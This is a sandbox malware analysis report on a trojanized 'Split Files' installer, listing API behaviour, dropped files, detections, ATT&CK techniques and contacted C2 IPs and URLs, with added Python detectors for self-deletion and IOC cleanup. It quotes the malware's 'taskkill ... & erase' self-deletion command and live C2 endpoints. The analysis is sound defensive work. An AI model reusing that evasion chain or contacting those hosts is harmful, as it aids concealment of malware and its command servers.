Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; API coverage: 8.5 %
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0045157C FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0048AC5C FindFirstFileA,6D2969D0,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_00423E2D FindFirstFileExW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_1000959D FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; Code function: 3_2_01314A1A FindFirstFileExW,
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338055162.0000000001839000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW`
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
Source: C:\Windows\SysWOW64\taskkill.exe; Process token adjusted: Debug
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; Code function: 3_2_01315B47 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; Code function: 3_2_013133EF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0040F789 SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; Code function: 3_2_01311889 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; Code function: 3_2_01314362 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; Code function: 3_2_01311269 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe; Code function: 3_2_013116F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
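The cmd.exe command line above is the classic self-deletion chain: the payload spawns a shell that kills the payload by image name and then erases its own path, so the file is gone before anyone collects it from disk. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code. It runs a detector over constructed process-creation events modelled on the Sysmon Event ID 1 fields ParentImage, Image and CommandLine: the three processes the report shows plus two benign shell invocations, and it flags only the event in which both the taskkill target and the erase/del target resolve to the parent's own image name. The ProcEvent structure, the event contents and the two regular expressions are constructed for the example.

```python
"""Flag a process that spawns cmd.exe to taskkill and erase its own image.

Added example; events are constructed to mirror Sysmon Event ID 1 fields.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # ParentImage
    image: str          # Image
    command_line: str   # CommandLine


# taskkill /im <name> [/f], with /f allowed before or after /im
TASKKILL_RE = re.compile(r'taskkill\s+(?:/f\s+)?/im\s+"?([^"\s]+)"?', re.IGNORECASE)
# erase|del <path>, quoted or not, up to the next "&" or end of line
DELETE_RE = re.compile(r'\b(?:erase|del)\s+"?([^"&]+?)"?\s*(?:&|$)', re.IGNORECASE)


def basename(path):
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def find_self_delete(events):
    """Return one hit per cmd.exe whose command line kills and erases its parent."""
    hits = []
    for ev in events:
        if basename(ev.image) != "cmd.exe":
            continue
        kill = TASKKILL_RE.search(ev.command_line)
        erase = DELETE_RE.search(ev.command_line)
        if not (kill and erase):
            continue
        parent = basename(ev.parent_image)
        # both halves must name the parent: a del of a log file or a taskkill
        # of some other process is ordinary installer behaviour, not self-deletion
        if kill.group(1).lower() == parent and basename(erase.group(1)) == parent:
            hits.append({
                "parent": ev.parent_image,
                "deleted_path": erase.group(1).strip(),
                "command_line": ev.command_line,
            })
    return hits


# Constructed events: the three processes from the report plus two benign shells.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp",
              r"C:\Program Files (x86)\Split Files\SplitFiles131.exe",
              r'"C:\Program Files (x86)\Split Files\SplitFiles131.exe"'),
    ProcEvent(r"C:\Program Files (x86)\Split Files\SplitFiles131.exe",
              r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f '
              r'& erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\SysWOW64\taskkill.exe",
              r'taskkill /im "SplitFiles131.exe" /f'),
    # benign: an installer deleting its log, and a shell killing an unrelated process
    ProcEvent(r"C:\Temp\setup.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c del "C:\Temp\setup.log"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c taskkill /im notepad.exe /f & del "C:\Temp\notes.txt"'),
]

if __name__ == "__main__":
    for hit in find_self_delete(SAMPLE_EVENTS):
        print(f"self-delete by {hit['parent']}: {hit['command_line']}")
```

Keying on the parent's image name rather than on the presence of taskkill and erase alone is what keeps the rule quiet on ordinary uninstall and cleanup scripts. In a real pipeline you would also want to record the grandchild taskkill.exe event, since its /im argument equalling its grandparent's image name is the same signal seen one hop later, and you would preserve the file from the erase path before the shell completes.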
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00459734 GetVersion,GetModuleHandleA,6D295550,6D295550,6D295550,AllocateAndInitializeSid,LocalFree,
Source: SplitFiles131.exe, 00000002.00000002.338567350.000000000351F000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: Program Manager
Source: SplitFiles131.exe, 00000002.00000002.338567350.000000000351F000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: program manager
Source: SplitFiles131.exe, 00000002.00000002.338567350.000000000351F000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: F.program manager
Source: C:\Users\user\Desktop\file.exe; Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\file.exe; Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: GetLocaleInfoA,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe; Code function: 2_2_0040F7F3 cpuid
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D295CA0,SetNamedPipeHandleState,6D727180,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004026C4 GetSystemTime,
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00405CC0 GetVersionExA,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp; Code function: 1_2_00453D18 GetUserNameA,

                Stealing of Sensitive Information

Source: Yara match; File source: 2.2.SplitFiles131.exe.3370000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.SplitFiles131.exe.3370000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one line per tactic; a leading number is the count of matched signatures for that technique, unnumbered entries are the unmatched grid)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 2 Native API; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 Access Token Manipulation; 13 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 2 Masquerading; 1 Disable or Modify Tools; 1 Access Token Manipulation; 13 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 23 Software Packing; Indicator Removal from Tools
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 141 Security Software Discovery; 3 Process Discovery; 11 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 3 File and Directory Discovery; 26 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 1 Input Capture; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph (ID 778228, sample file.exe, start date 05/01/2023, architecture WINDOWS, score 100). The rendered graph is not reproduced here; its process tree and network nodes are:

file.exe (started)
  drops C:\Users\user\AppData\Local\...\is-6A80U.tmp (PE32)
  starts is-6A80U.tmp
    drops C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+), C:\Users\user\AppData\Local\...\_iscrypt.dll (PE32), C:\...\unins000.exe (copy) (PE32), and 3 other files (2 malicious)
    starts SplitFiles131.exe
      contacts 107.182.129.235:80 (META-ASUS, Reserved; local port 49685), 171.22.30.106:80 (CMCSUS, Germany; local ports 49686, 49687), 45.139.105.171:80 (CMCSUS, Italy; local port 49684)
      drops C:\Users\user\AppData\...\2v3Q9V1aRpd.exe (PE32)
      starts 2v3Q9V1aRpd.exe (Multi AV Scanner detection for dropped file)
      starts cmd.exe
        starts taskkill.exe
        starts conhost.exe

Other graph nodes: 45.139.105.1 (CMCSUS, Italy), 85.31.46.167 (CLOUDCOMPUTINGDE, Germany). Signatures attached to the root: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 5 other signatures.

Initial Sample: No Antivirus matches

Dropped Files (Source | Detection | Scanner | Label)
C:\Program Files (x86)\Split Files\SplitFiles131.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_iscrypt.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe | 50% | ReversingLabs | Win32.Trojan.Generic

Unpacked PE Files (Source | Detection | Scanner | Label)
1.2.is-6A80U.tmp.400000.0.unpack | 100% | Avira | HEUR/AGEN.1248792
2.2.SplitFiles131.exe.10000000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
0.0.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
0.2.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
2.2.SplitFiles131.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1250671

Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label)
http://www.innosetup.com/ | 0% | URL Reputation | safe
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte | 0% | URL Reputation | safe
http://107.182.129.235/storage/extension.php2 | 100% | URL Reputation | malware
http://107.182.129.235/storage/extension.php | 0% | URL Reputation | safe
http://www.remobjects.com/?ps | 0% | URL Reputation | safe
http://107.182.129.235ibrary.php | 0% | URL Reputation | safe
http://171.22.30.106/ | 100% | URL Reputation | malware
http://45.139.105.171/ | 0% | URL Reputation | safe
http://www.innosetup.com | 0% | URL Reputation | safe
http://107.182.129.235/storage/ping.php | 0% | URL Reputation | safe
http://171.22.30.106/library.php | 100% | URL Reputation | malware
http://www.remobjects.com/?psU | 0% | URL Reputation | safe
http://107.182.129.235/storage/extension.phpu | 0% | Avira URL Cloud | safe
http://107.182.129.235/storage/extension.phpC& | 0% | Avira URL Cloud | safe
http://www.innosetup.comDVarFileInfo$ | 0% | Avira URL Cloud | safe
http://171.22.30.106/library.phpT | 9% | Virustotal |
http://107.182.129.235/storage/extension.phpr | 16% | Virustotal |
http://107.182.129.235/storage/extension.phpr | 100% | Avira URL Cloud | malware
http://171.22.30.106/u | 100% | Avira URL Cloud | malware
http://171.22.30.106/library.phpT | 100% | Avira URL Cloud | malware
http://107.182.129.235/storage/ping.phpS | 100% | Avira URL Cloud | malware
http://www.altarsoft.com/split_files.shtml | 0% | Avira URL Cloud | safe
http://107.182.129.235/storage/extension.phpO | 0% | Avira URL Cloud | safe
http://rus.altarsoft.com/split_files.shtml | 0% | Avira URL Cloud | safe
http://107.182.129.235/ | 0% | Avira URL Cloud | safe
http://171.22.30.106/n | 100% | Avira URL Cloud | malware
http://171.22.30.106/library.php4 | 100% | Avira URL Cloud | malware
http://107.182.129.235/storage/extension.phpz | 100% | Avira URL Cloud | malware
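Most rows in this table are the same few URLs with one or two stray bytes glued on by the memory carve (extension.phpu, extension.phpC&, library.phpT, /u, /n), and the reputation verdicts diverge on exactly those junk variants: extension.php2 scores 100% malware while extension.php scores safe, and library.phpT gets 9% from Virustotal but 100% from Avira. Blocklists and hunts should be built on the canonical strings and on the three contacted IPs, not on the variants. The Python below is an added example, not part of the Joe Sandbox report: it takes the URL column of this table as its input, rejects strings whose host is not a plausible hostname (the DVarFileInfo$ and 235ibrary.php overlaps), strips one or two trailing characters after a known file extension, folds any remaining string that equals a known URL plus at most two characters into that URL, and returns the canonical URLs, the IPs and domains behind them, and the variant-to-canonical map so a reviewer can audit every fold. The extension list and the two-character bound are assumptions chosen for this data.

```python
"""Fold memory-carved URL strings from a sandbox report into a reviewable IOC list.

Added example; CARVED_URLS is the URL column of the report's URL table. The
extension list and MAX_FOLD are assumptions for this data, not report settings.
"""
import re

URL_RE = re.compile(r'^(https?)://([^/?#\s]+)(.*)$', re.IGNORECASE)
HOST_RE = re.compile(r'^[a-z0-9.-]+$')                          # LDH characters only
BROKEN_IP_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}[^.\d]')    # "1.2.3.4ibrary" overlap
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
# one or two stray characters glued onto a file extension: extension.phpC&, library.php4
TRAILING_JUNK_RE = re.compile(r'(\.(?:php|html?|aspx?|jsp|exe|dll|txt))[^/?.]{1,2}$',
                              re.IGNORECASE)
MAX_FOLD = 2   # a known URL plus at most this many characters is treated as that URL

CARVED_URLS = [
    "http://www.innosetup.com/",
    "http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte",
    "http://107.182.129.235/storage/extension.php2",
    "http://107.182.129.235/storage/extension.php",
    "http://www.remobjects.com/?ps",
    "http://107.182.129.235ibrary.php",
    "http://107.182.129.235ibrary.php",
    "http://171.22.30.106/",
    "http://45.139.105.171/",
    "http://www.innosetup.com",
    "http://107.182.129.235/storage/ping.php",
    "http://171.22.30.106/library.php",
    "http://www.remobjects.com/?psU",
    "http://107.182.129.235/storage/extension.phpu",
    "http://107.182.129.235/storage/extension.phpC&",
    "http://www.innosetup.comDVarFileInfo$",
    "http://171.22.30.106/library.phpT",
    "http://107.182.129.235/storage/extension.phpr",
    "http://171.22.30.106/u",
    "http://107.182.129.235/storage/ping.phpS",
    "http://www.altarsoft.com/split_files.shtml",
    "http://107.182.129.235/storage/extension.phpO",
    "http://rus.altarsoft.com/split_files.shtml",
    "http://107.182.129.235/",
    "http://171.22.30.106/n",
    "http://171.22.30.106/library.php4",
    "http://107.182.129.235/storage/extension.phpz",
]


def normalize(raw):
    """Return a cleaned URL, or None if the string is not a plausible URL."""
    m = URL_RE.match(raw.strip())
    if not m:
        return None
    scheme, host, rest = m.group(1).lower(), m.group(2).lower(), m.group(3)
    if not HOST_RE.match(host) or BROKEN_IP_RE.match(host):
        return None                      # junk bytes inside the host: not a usable IOC
    path, sep, query = rest.partition("?")
    path = TRAILING_JUNK_RE.sub(r"\1", path) or "/"
    return f"{scheme}://{host}{path}" + (f"?{query}" if sep else "")


def fold(urls):
    """Map each URL to the shortest known URL it extends by at most MAX_FOLD chars."""
    canonical, mapping = [], {}
    for url in sorted(set(urls), key=lambda u: (len(u), u)):
        base = next((c for c in canonical
                     if url.startswith(c) and 0 < len(url) - len(c) <= MAX_FOLD
                     and not set(url[len(c):]) & set("/?")),   # "/x" or "?x" is real
                    None)
        if base is None:
            canonical.append(url)
            base = url
        mapping[url] = base
    return mapping


def extract_iocs(raw_strings):
    """Canonical URLs, hosts split into IPs and domains, folds made, strings rejected."""
    rejected, cleaned = [], {}
    for raw in raw_strings:
        url = normalize(raw)
        if url is None:
            rejected.append(raw)
        else:
            cleaned[raw] = url
    folded = fold(cleaned.values())
    final = {raw: folded[url] for raw, url in cleaned.items()}
    urls = sorted(set(final.values()))
    hosts = {URL_RE.match(u).group(2) for u in urls}
    return {
        "urls": urls,
        "ips": sorted(h for h in hosts if IPV4_RE.match(h)),
        "domains": sorted(h for h in hosts if not IPV4_RE.match(h)),
        "variants": {raw: url for raw, url in final.items() if raw != url},
        "rejected": rejected,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(CARVED_URLS).items():
        print(key, value)
```

The two-character fold is deliberately narrow but can still merge genuinely distinct URLs (an id=1 and an id=12 query would collide), which is why the map of what was folded is returned rather than discarded. On this table the result is eleven canonical URLs and the three IPs the behaviour graph shows being contacted, 107.182.129.235, 171.22.30.106 and 45.139.105.171, which are the network indicators worth pivoting on; the installer vendor domains (innosetup.com, remobjects.com, altarsoft.com) are Inno Setup and Split Files strings and should be treated as context, not as indicators.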
                No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte | true | URL Reputation: safe | unknown
http://107.182.129.235/storage/extension.php | true | URL Reputation: safe | unknown
http://107.182.129.235/storage/ping.php | true | URL Reputation: safe | unknown
http://171.22.30.106/library.php | true | URL Reputation: malware | unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drfalse
                • URL Reputation: safe
                unknown
